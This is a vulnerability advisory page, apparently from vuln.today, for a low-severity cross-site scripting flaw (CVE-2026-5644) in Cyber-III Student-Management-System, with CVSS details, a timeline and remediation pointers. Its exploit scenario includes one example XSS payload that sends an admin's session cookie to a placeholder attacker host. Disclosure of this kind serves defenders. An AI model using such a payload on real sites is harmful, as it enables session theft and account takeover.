Skip to main content

PHP CVE-2026-5644

| EUVD-2026-19217 LOW
Cross-site Scripting (XSS) (CWE-79)
2026-04-06 VulDB GHSA-7h2q-r7w3-qfpr
1.9
CVSS 4.0 · NVD

Severity by source

NVD PRIMARY
1.9 LOW
CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from NVD · only source for this CVE.

CVSS VectorNVD

CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
High
User Interaction
P
Scope
X

Lifecycle Timeline

6
Severity Changed
Apr 29, 2026 - 01:11 NVD
MEDIUM LOW
CVSS changed
Apr 29, 2026 - 01:11 NVD
4.8 (MEDIUM) 1.9 (LOW)
PoC Detected
Apr 07, 2026 - 13:20 vuln.today
Public exploit code
EUVD ID Assigned
Apr 06, 2026 - 10:15 euvd
EUVD-2026-19217
Analysis Generated
Apr 06, 2026 - 10:15 vuln.today
CVE Published
Apr 06, 2026 - 10:00 nvd
MEDIUM 4.8

DescriptionCVE.org

A security flaw has been discovered in Cyber-III Student-Management-System up to 1a938fa61e9f735078e9b291d2e6215b4942af3f. Affected is an unknown function of the file /admin/Add%20notice/batch-notice.php. Performing a manipulation of the argument $_SERVER['PHP_SELF'] results in cross site scripting. The attack can be initiated remotely. The exploit has been released to the public and may be used for attacks. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet.

AnalysisAI

Stored cross-site scripting (XSS) in Cyber-III Student-Management-System via manipulation of the $_SERVER['PHP_SELF'] variable in the batch-notice.php admin file allows authenticated attackers with high privileges to inject malicious scripts. The vulnerability affects all versions up to commit 1a938fa61e9f735078e9b291d2e6215b4942af3f, exploitable remotely with user interaction, and publicly available exploit code exists. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Vulnerability AssessmentAI

Risk Assessment The CVSS 4.0 vector (AV:N/AC:L/AT:N/PR:H/UI:P) indicates network-accessible vulnerability with low attack complexity but requiring high privilege (administrator) authentication and user interaction (UI:P), limiting exploitability. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker with administrative credentials (or who has compromised an admin account) crafts a malicious URL containing JavaScript payload in the PHP_SELF parameter and tricks another administrator into clicking the link, for example: `/admin/Add%20notice/batch-notice.php?param=<script>fetch('http://attacker.com/steal?cookie='+document.cookie)</script>`. When the target admin visits the page, the unescaped PHP_SELF value is injected into the HTML, executing the attacker's script in the admin's browser context, potentially exfiltrating session cookies or performing admin actions on behalf of the victim. …
Remediation Immediate remediation requires updating Cyber-III Student-Management-System to a patched commit after 1a938fa61e9f735078e9b291d2e6215b4942af3f; consult the project's GitHub repository (https://github.com/Cyber-III/Student-Management-System/) for the latest commit or pull any recent changes to obtain the fix. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-5644 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy